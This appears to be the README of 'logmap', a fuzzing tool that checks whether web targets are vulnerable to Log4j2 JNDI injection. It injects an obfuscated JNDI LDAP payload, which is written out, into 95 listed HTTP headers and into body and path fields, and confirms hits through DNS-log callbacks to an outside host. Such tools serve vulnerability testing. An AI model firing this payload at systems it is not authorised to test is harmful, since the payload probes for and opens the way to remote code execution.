logmap - Log4j2 jndi injection fuzz tool
Used for fuzzing to test whether there are log4j2 jndi injection vulnerabilities in header/body/path
Use https://log.xn--9tr.com dnslog by default, If you want to use http://ceye.io, you need to modify the domain and token
Manually edit line #373 in logmap.py to modify:
args.ceye = ["xxxxxx.ceye.io", "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"]
to
args.ceye = ["1234567.ceye.io", "843fd6d58a8ebede756a2b991d321a5a"]
The default payload is ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//DNS_LOG_DOMAIN/a} You can customize at will, in line #283
This is just a jndi injection fuzz tool, rce or others need yourself
Use
[email protected]:~/$ pip3 install -r requirements.txt
[email protected]:~/$ python3 logmap.py -h
Options
-u URL, --url URL Target URL (e.g. http://example.com )
-f FILE, --file FILE Select a target list file (e.g. list.txt )
-d 1, --dns 1 Dnslog [1:log.xn--9tr.com, 2:ceye.io] default 1
-p PAYLOAD Custom payload (e.g. ${jndi:ldap://xx.dns.xx/} )
-t 10 Http timeout default 10s
--proxy PROXY Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)
-h, --help Show this help message and exit
Config
There are currently 95 fuzz headers
Accept-Charset
Accept-Datetime
Accept-Encoding
Accept-Language
Ali-CDN-Real-IP
Authorization
Cache-Control
Cdn-Real-Ip
Cdn-Src-Ip
CF-Connecting-IP
Client-IP
Contact
Cookie
DNT
Fastly-Client-Ip
Forwarded-For-Ip
Forwarded-For
Forwarded
Forwarded-Proto
From
If-Modified-Since
Max-Forwards
Originating-Ip
Origin
Pragma
Proxy-Client-IP
Proxy
Referer
TE
True-Client-Ip
True-Client-IP
Upgrade
User-Agent
Via
Warning
WL-Proxy-Client-IP
X-Api-Version
X-Att-Deviceid
X-ATT-DeviceId
X-Client-IP
X-Client-Ip
X-Client-IP
X-Cluster-Client-IP
X-Correlation-ID
X-Csrf-Token
X-CSRFToken
X-Do-Not-Track
X-Foo-Bar
X-Foo
X-Forwarded-By
X-Forwarded-For-Original
X-Forwarded-For
X-Forwarded-Host
X-Forwarded
X-Forwarded-Port
X-Forwarded-Protocol
X-Forwarded-Proto
X-Forwarded-Scheme
X-Forwarded-Server
X-Forwarded-Ssl
X-Forwarder-For
X-Forward-For
X-Forward-Proto
X-Frame-Options
X-From
X-Geoip-Country
X-Host
X-Http-Destinationurl
X-Http-Host-Override
X-Http-Method-Override
X-HTTP-Method-Override
X-Http-Method
X-Http-Path-Override
X-Https
X-Htx-Agent
X-Hub-Signature
X-If-Unmodified-Since
X-Imbo-Test-Config
X-Insight
X-Ip
X-Ip-Trail
X-Leakix
X-Original-URL
X-Originating-IP
X-ProxyUser-Ip
X-Real-Ip
X-Remote-Addr
X-Remote-IP
X-Requested-With
X-Request-ID
X-True-IP
X-UIDH
X-Wap-Profile
X-WAP-Profile
X-XSRF-TOKEN
Some body and path
You can also modify him to add your own body
payload={}
user={}
pass={}
username={}
password={}
login={}
... ...
?id={}
?username={}
... ...
43 Dec 23, 2022
117 Dec 30, 2022
1 Jan 31, 2022
2 Dec 16, 2021
376 Jan 01, 2023
95 Dec 26, 2022
809 Dec 26, 2022
41 Dec 30, 2022
70 Nov 09, 2022
92 Jul 20, 2022
24 Nov 29, 2022
2 Aug 21, 2022
48 Nov 26, 2022
30 May 17, 2022
66 Nov 08, 2022
1 Jan 23, 2022
80 Dec 30, 2021
22.1k Jan 02, 2023
130 Dec 29, 2022
25 Dec 06, 2022